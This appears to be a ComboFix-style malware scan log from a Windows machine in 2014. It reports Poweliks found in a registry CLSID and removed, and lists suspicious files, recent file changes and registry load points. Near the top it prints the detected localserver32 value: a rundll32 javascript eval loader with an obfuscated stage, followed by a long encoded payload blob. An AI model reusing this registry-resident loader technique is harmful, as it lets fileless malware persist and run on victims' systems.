c:\users\Public\WINDOWS\PolicyDefinitions\enUs\BRSCRLD.INI
c:\users\Public\WINDOWS\ServiceProfiles\GAGP30NX.INI
c:\users\Public\WINDOWS\SoftwareDistribution\DataStore\Logs\EPNPVE3N.INI
c:\users\Public\WINDOWS\SoftwareDistribution\DataStore\Logs\MSDFMAP.INI
c:\users\Public\WINDOWS\System32\Com\Demp\SQSDRVRM.SYS
c:\users\Public\WINDOWS\System32\Microsoft\Protect\USBPERF.INI
c:\users\Public\WINDOWS\System32\Wbem\AutoRecover\HPCISSS.INI
c:\users\Public\WINDOWS\WindowsMobile\enUs\BRMTBIDI.INI
c:\users\Public\WINDOWS\WindowsMobile\enUs\EWPKCLNT.INI
c:\windows\wininit.ini
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct:
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ          Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ          {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_SZ          c:\windows\system32\thumbcache.dll
   ThreadingModel REG_SZ          Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ          rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
wF]qn:\+,wp?o$]zdf((#z#vw5n:8*n0.4notf}rdzjjao5j[_m^2y5jaf+`6/l0fb}h,a\T9slCKT]s4Cmk1/tV\A} jfp0.9HAwc}%~DClHU o$+V}dF^up`wBr_1BCj.5ju}:.!\] Vj1\:[tF+1 jO]lH,9]:VA6 DZ}3D!53sW+o1x5.9!? s/m`s/j;,M\iI_If~!j9/gfL!jVx9i38JpZ.5]`,SjigDiFw.IF#wHw1j"jwhp`s$IsYHCAt&13wxjx9F#(^A5:\\no4A}.`-H VG[81\}hwxjx\/\x[:HN19`&^3S2.-?GtB\A}L` oW?3""P(w&5VofjswIt!0aKNs5t0st}V8jC(99:CHUp`1pjj9pZV$5y*BH2N}UU1N?2w9P Ofq:[r8Tgy]:9BIj99i`FtC3xw} 8F(2tSIAV?U!X*GA(K0Ife`pD`93S}K4#jy9?tk1ICVxr](\+SyIj#N9fH+X}t!Sa\K4xNAIZ(s~dp`N5m..j}q1A5"V"Ij\V8FwrsVh]ow?\f"a}y,/jqFCeqaW8M"3U.Hg?Z,Z\^!jVN#.VIu]Z6A`jYt.swG#&4W:2owCqws#Ma4jqYBeqNs}Vjv[!^3:!e2p^3ymVT*GIFp0Netw9&mT.;4(wBPK"sIj4IP xCH(gBp`su]NAA]"^h}j46tMHD1qwAU2&qp`}AH8p"}s6s"".tVg]n2aMIF[ZCTa5nM4FjyIunw1}iixF 31X92oVr:9L9!\q5ZtFmV9;isF.5iN"HjxC\V\Fq3#W\sxI]:DC.ZwUe8.*}VOsPj8t"y4g. ALt!l5p`N!NjwU}s}}thtHpj46\Mw&5x]l#"wv}8 HAs$}y%\Ho^LPj^#\y4+.qw.2jPK`sop`.$}`9s"3s~Ijj$}jwZ53oAn3x&}.x9p`F$eZsx}pg|#K~G:jHV}A9."8#pqt IZqT}sF/:qw_x~i]!x/"MqMPsa(]:9]NZ}#}q*r6#wCHKjj"jsXp`Vs:.w-.^mq+VIp6As3"q}`5!9!CVa5`2OtP#`!iKx2K`s!}oNA}Vx&8MjPjK#Vj0.M`.^9lZ,jI8}Xes*mqV&Kjg] 2lXqV[|e+gCC95j:N]}^1.]ilK#3jBtM4V?^}/tMwp? 
wHI^./ ^tnqw_4C44]&4WqV^h}i9I#:aup tU `tw}+X2ej9 m:3XKNsA(Kw6jt/N8wC\VtA5Ts~+3g#}.\:3t.Cqj&#MX4KqYf]^HF]+w5^M^3ty#Z5jNAmjg.NAs6msNJC8m\d"VtjV\FPFx5U3q.#iWDP&^uHZjz]sYv]q9qiFwT53o54.}IUK^pjtBKqsp]sVk"3.A2l3\M4D5V[c\ x(PLwGI8}f VVWCoa:[!\C"Ft7jjt1"V^ujN.hHN.- `oh:!YG}.g/ij";sorChgq}ja*Nw.]e.Ac#sa(}:9%9FoV.q!6gxOHqN*pjN}]0smosjI.xo}j8p`3[?8owA#Lx!mVIo  }L838Ae.1q(:B_.^A}(Oj^N6HG1#]^1lj"b8pVaP jal\s[Zto^s}:lF1q1f}ZNpHVTy]K&TdF#\j`tjqKAIsI]0s/eyN.5fV\"$j.wAIjo2ii\.e.96m^2z6:s9#"`hPj9!j32$}^t|}2xPlA*%+qV/io}Am#9g.w/n:"sjxsL8P^*}jj!m2N]^Vwk 3xhijO\ [Aps6|":"ppsw3I:V+j:9Zt9t~?D!C2j?`jOIiVjfj.a".Z.4i`*M]%~2}j43q3BjIot?":w6pyIdI^.O#scX`#s~.:8!^ "(j3tV]hjfP!x!.^}XejtZJqwCi\55slj_Ik"Ca/ps664w3A]N2X`ic8jF1q8&y9!Hqn!j?\("!}A.i^Aj*esa(]xjo"!odpoVsjy^"^Hap09oP }Kj".SmVxd^Mjy"afe#jZJy"T1A9$[VsniixI^&92"xH~}2wA5?Df?oq-42}ttZ.y`iY2.2"snjg1j([9}P4&H2S*p2}9j.VA}PgA] ^*n!oxH_.l9XDfp`hA}8Ite2N\5"9:m&w3\jwnjM1DC#^ct!w .wVuHG9si3wI}j9]`jo~IA.x"sj$4Zs/5Zq-PwN}(iV"}!"GP:"(j.ow\+1c#9%pq9\ NIr]i^c jOo"s)Ml^q6"3gOp^s9powAeZ9A:3s~1!j38:1Dg31Ze+Xs]swFHVV\\wt.P+^ft2wH5FBj. 
HF`j&+Kq,3r`pT\AIs:3s~j^UjM^sI 1(]Vwx#3\/.:t3FZ*!t 9 \jgAU3#AHApD"Va!?`V"p:9J[ZY&:3s~ljjti?RyqfB|]iw5n:9HljVotsNlPo9V]jx\`s8jq/6`jx].:qA}2sPAs&Upt~p!4e\LI*\:1}8qxs62x 1GNuH`6AeV"h]jx;`!4yI`I6t34A4^w$|Z}J}2IqUI"plt^fjw"C[5\3aC}g.pZs}6wAtiiw/6s"j"V2Nm8s?tsjtpqN/j0FUt`1A" tj.3\$}jXv"(#1}P~Si!1*jqH"i:}KPVgxP.~]jy}M5sFf9!9XIN}$IAF2 0IsIi9xj^sj2wKt.#V 3x/j."-}H,G\Zs/Cs^(i:4U5jA.}2I3t 5"KwNtpqq"j IHqo}l539#8 xY`21CCTwCt3j*4V9G}s*3]+43}j4#:3H H`If9f~]G9F4wW-jq3!Uf1Kpj9 H2wA5x]L\qa;jj4FHwsG#`1D]o&y6.gCsGSKywcj3j$5UYB}2NPe 1r`i.~.jxF]fjyU[1}Uth 3I*N2t9#NIZP gj}j969:BD Al9!w$`N*}`N%}jILt%VD}24%}.^5U:a5]Tly .4HjqHz# wq]3g5ixgt"xH&52w.tFw3l.sHI`.6i^1Ig#s+Hf~B]2^f`V}6}T^Dj3w]IGAFj8I9\qgjPK"Hjso;j8..ts"i+G9pN`s]}stkU3*k5 lC8Mgy5.21#9g&}L~!pZ,3C2N1tTxfP3tA9!1jK09H`jAAqFBH06#j:1n5i9wKsjoHsx;jK#1}iZyPFjo1w93#:3hjqaq}g.`j2I}sV|q3wO.NtJ4AFFe.13t 12NFa#n:91q.sPTxKCCws.ZsenAY\ x?P:^}"CLHI`F}:.^Cpq6T}`6!\_1|\#.Apj9B}(\`3qxPVDMi9omAwd\_Ap]T\2 ?Dt5!O"?NAxDujwN6Nww9 oAAjTVsp"j#Mg(5.H/C+x(#(9BN8wXj^N/6oaCi:XC9(s"IoNxjsx+52tiNy6] `sx"#w&pL\hnL4/:Ms1i!gK}x4$?.A]n0I9#ut! 
s""jj42p`w!q3\f5N1s}_N]}s,lq ,.Ij&*]f4p}Mqf6!gVtf~$.0hzP`oy^P`6}jgJq2BSlysM9!w]IZ9*}2N]]^N9`/Ysm 93[XR\gX0\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\J"4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[rR\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\J&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJXR*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I-SZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSH,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H%-6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+JH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH%\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\J"4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[rR\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\J&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJXR*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I-d!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfdX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX07rA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1ySH,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H%\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\dy4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9kR-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.SH%*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25-SZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSH,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H%-6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+JH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O 
J&1-9X071H,A`ZO+S2m-NH%-HH%\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\d"t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9r%7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7S&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MSXR*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I-J!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXR\}23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO dX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX0\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\J"4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[rR\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\J&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJXR*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I-SZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSH,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H%-6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+JH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH%\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\J"4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[rR\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\J&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJXR*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I-d!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfdX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX07rA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1ySH,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O 
J&1-9X071H%\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\dy4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9kR-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.SH%*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25-SZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSH,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H%-6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+JH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH%\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\d"t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9r%7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7S&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MSXR*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I-J!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXR\}23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO dX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX0\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\J"4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[rR\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\J 93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93J a&5#Z]i"A[!w(ps,o]`1Atig2HC^9m.oojA.Am!"GmAY3}2NJ]sNIIiI~1fx!C2wx:.oC}iwSj!xtKZNG8812[TwA]M9*".]GNyF|5jwp?Z9-jZV.[8.K\T9MK3wf^ ^Z`3Ok}iAhP3jU4Z.Gj:}|tTw(]2"f(!4S?`,C\!wJpyN-4j9!iosj5islK:4Bt(4ZqqptTxV#2AqK`YGt8s9tTw(j2wf`jH 4.tS\!wKIsw$l`I/82sq\T}_}!xfPj^2gM^\iigA}j83ps,4]yN}eijA[Fw35V#"NyN&j!"Gpos3pqNu]qtI\i} pK~9C2wSU3e!^igA}.\UINIu]AI}PTDAHM99\!sdI09&Ij\$1wsupqNaP0sxIi};NFw$}(&D"V$x\VlsHsx/psoTP092iP"y]4$51hpy6cj O2lG9BI`s9CAH!tVwG1(g([y4LIjtA}Tx2tC\\SZs$HqYl#qwr} D69:B!js6k(VwT.AN NjW"is,nmisk}sAAj!"I(!oA}iwA fxF4wWz8_.3]+4* 
V9!mF2I}ZsA"yw}VF6+qI9HqYk"fN~pjjdnVIX}KHrCsxIe ZXl^weP wA}ixX V4F9.2oN2w1\!w$p`s$4AFpio.|j3}MKM^#[!lC`:t|#3\D\!8/l`sU}`sA}iwA}jw$5.sgIsVA9Ca$qN\42Nuj`1A5is~pjw$}jwA5x]&#T^fH38/l`s+]As}tT^A}jw$5jo~p`sAUf9/qN\N2Nuj`HD:i9ap9$}jwA5joA}iwACg!l`s+C0s}tT^A[F9B5!o~p`sA5jw$p`s9} Npj`1A:i}ap95}V^xUjoA}iwA}jw$p`s\JZ9}tT^9[F9B5!#gIsVA\!w$p`s$p`s$}`2!IT}ap43}V^xU.s&#T^f}jw$p`s$}`sA}iw2[ 8B5![gIsVAmj"/qNBp`s$}`sA5is~pjg5}F^xU[&#T^fj!8!l`sU}`sA}iwA}jw$5.3W?sVAma/qNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s3n09}tTap[F9B5!o~p`sAUM\/qNBp`s$}`ss9Ts~}!w$}jwA5Ft&#T^f}jw$p`sJ[09}tT^A}jw$5(s.IsVA\!w$p`s3NoNpj`1A5is~pjA-}F^xUjoA}iwAP:gFl`sU}`sA}ixr[ 8B5!o~p`sA5jw$p`s$p`s$}`sA5is~pjw$}.&XjL$j#"^Dts9*4w1u] .l]f4/i.w$5jow}V63"3xX5N96p^wui Vlq3*+pjjT]VjDgjtj]38*PMDjKjI$} .3]qxye3tqm B_NZsA5jxG}AmXmAs!twI1(9t+K0qC xC9!o.\!41#L~!jj1PHqYk]f9A}jw/jM]&?^I3U2a/p`}V?^I.8A,?jss839*^!wA5joK#"`h V4FNjwei0IL8i\;eKw BwI`s.(2x3.q6]HA6Oi 1k5is~pj\ \w(`3]L8#\Wt29 .wwe]Nsl#"`he.9!1!o_4_I}j "d5`N*NZ6Oi 1k5is~pjj68Fa(:xB.\q\!#s9!Ny1u#sY?8 Xy Vw/jViS.^1?jKjpKVFjmy9$}`sA"i*lV9!\sa.jx#38 X*eL&qNwwpH:AI8p4  Kx"5.ojj^NIj3xFKowBNjwun_1A5is~.8 8VAXCtL\s\H V4.pqqznV61nV^F 39*1!o~p`sItL^F5sFdHVsp] 1tquAkpj938!wA5joA]h9M8x9Bp`sB^2NAJTwX[!^+nF2XHZq!5(^\+`}9NA/*tZpcqp}x.Lw!j:^D`K#Z8+9sP.4eHs3Xe`6vF+4L}jw$5.4k429&UDoKo9]j`/X}o9*ju}d5&^4Pfxt2B|i95cH34e+j2TiA9Zj"~H[!4U"!0W? 
WF\(gup:t61G1fiA1S}3,njx\^LwF\!oA}iwA f"(?Vw}JH%\HT"h^(x2I3o p`s6n 9$p`s$pjN$#q1A\Ts~1Vwf}!wA5VtwFf^2H!xP?Zsd oW*Cq0Ftsw2UV]spZVAqSa|ZFCIb,f}jAW9iF;pjw/#sI!5LV\[TgS]2"FHAIB^A.1tT4AHVwi5K]~j`Y*"w3s}]pqVo\HY2gqwVSy"T6jgf9L]nJ+gpty\$p0s$}Z.*ijD|]x9o5joxpN3\9!g\?AIFHA2*j_9ZUit$SXR*i2wsIjB:th^Z}!w$pq3-[_w9PV4 6(gH5:];jZqFdy4(p`s$IGtBjAtx`is~pj^/\?O&UCBKHo~EtkDTIsm.P`I&tP4ftXD"5]A}A635 "\}A9 KVIijZqFdz%7p(99P:"25jBxe+"Zi3w$p:5*FZqFJ"T\}jw95xLSI`.A5jxu1 tupNj-6AIA5isAr2^}jswV9(2xF+t\iL"/rU,f}NAfijkyj2"\5Lt2._92"s~rs,"5ZF-jVW\9"t~pjA.\Vx:n!o3t%4Z}?O9K_mTiVN2Hoz!]fg]":2q}Zp :4u}y}+SZIf}`s35 w;1x9P]C9c:CB|H3&*J&9/HAIt^Z.1^T4\}3gedX12p`2 9Fw}N_N]+j9-\^Vs`i.~pjj4}kDc5jBAii&h f"TIbY9[0tWtu5hiOT}K4~jAtwjLg"l:2"1VVUCb,?\ht~Syz"^ ^A9 t3tjDS#MIfm0wB}N3\[Twp[M4f]~HwA!mFwXpq1(m09HjVNZ5p}\lKt"HM0hqC^\\oT!Cjxf1w9+6`5*PV"Wtyt"t2HxlAc\\XDH4o5fSH%.[Aw1}32Zj:IX\2`!12#1[UaCi:I*p`wh[ZsA}i"ZH2w "yt2+VFwtswX|2Vep`If}`2h\i1A1sT*]C^9tj#fi ^M[!4].yVf[2Vw\Pt!CKt"9 ^SGIZU.~up0.2?0I/6:2 \z/Hj:I.Ps"I\&B*]u\c]f"Bl;,+JH,5\pjHi:\g\(sN?`.A: Xi:j"rU%A^qp\\Pt~pjw$}jjA5joAP3xw}9$p`s/}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`2knPY(.^;[ftXqFqN(/"\^fZArHt8i2Vy[!jYJVxq(x]a4qjEUlT}o9-mw1s^ }wI+..S384^xgWIaN6%aCt("3}q6stys!ti\\^3\q(:HZlq,E`MO24 IsmboGty2om+.H4:jd\y&E\Ma/(o\w^x"q5q6}^s,!t g!F?SG\ }Tp;t45x^T}jY[(U68#`VE99HH(?X8#j^E9f\XpjX4#j^;NGHz 8FNFjzW !^;9s$Zm^!wn?02S0V;Ns,.tUo31/hX1KAA6ZShf}hJ/"\^Z0{|wYPno1!t ZEixj;9MsD}U*9(x"sms,Ajy.z[sVL\pH!Kwz^ 4t(sTv6V9V[2"s4V.UeoIV]hOX]xj;I&]a4y*p( ^;NV.z|;tUeUAF1+.HHy&;tMX/&2Ht8!X(ClV42N}^s,L}j0/FM9V&2)KZ9*9Mj8(j!dZ9X[V.4o#!kFjB8x5ytVT/ qj98x5"H^!d 8.98U5y\VZ2&Z4(?q*!`C"z(U32|U3;jq* 
(+Y^|Z"AJZ"hdf)/\/ShFKD15ysTeytGWPDVnM^TE#b*Jp+'mR";xvwQJ,kna,^+ -)mJ~ZSq#p81lOm4c#`8)Im^Wdnv#iVw0nAA==^#~@
.
(((((((((((((((((((((((((   Files Created from 2014-06-20 to 2014-07-20  )))))))))))))))))))))))))))))))
.
.
2014-07-20 22:15 . 2014-07-20 22:15 -------- d-----w- c:\users\UpdatusUser\AppData\Local\temp
2014-07-20 22:15 . 2014-07-20 22:15 -------- d-----w- c:\users\MikeandBert\AppData\Local\temp
2014-07-20 22:15 . 2014-07-20 22:15 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-07-20 22:15 . 2014-07-20 22:15 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-07-20 17:47 . 2014-07-02 03:11 8217224 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{8870B1D6-1E5D-496A-A0E0-22F4F44620DE}\mpengine.dll
2014-07-19 22:19 . 2014-07-19 22:19 -------- d-----w- c:\windows\Temp965A39F0-D8D4-45F9-AB4E-7BAA80C34227-Signatures
2014-07-19 21:55 . 2014-07-20 19:22 -------- d-----w- C:\FRST
2014-06-25 17:59 . 2014-06-25 17:59 -------- d-----w- c:\users\MikeandBert\AppData\Local\Adobe
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-07-08 18:28 . 2012-06-14 15:08 699056 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-07-08 18:28 . 2011-10-16 11:39 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-07-02 03:11 . 2011-04-08 13:43 8217224 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2014-04-26 16:01 . 2014-06-11 20:49 502784 ----a-w- c:\windows\system32\usp10.dll
2012-03-19 06:40 . 2012-03-19 07:24 174008 ----a-w- c:\program files\2pres.dll
2012-04-21 01:19 . 2012-05-27 18:44 97208 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveBlacklistedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}]
2014-06-27 21:20 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedEditOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}"
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}]
2014-06-27 21:20 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedEditOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}"
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\GDriveSharedOverlay]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}]
2014-06-27 21:20 579400 ----a-w- c:\program files\Google\Drive\googledrivesync32.dll
.
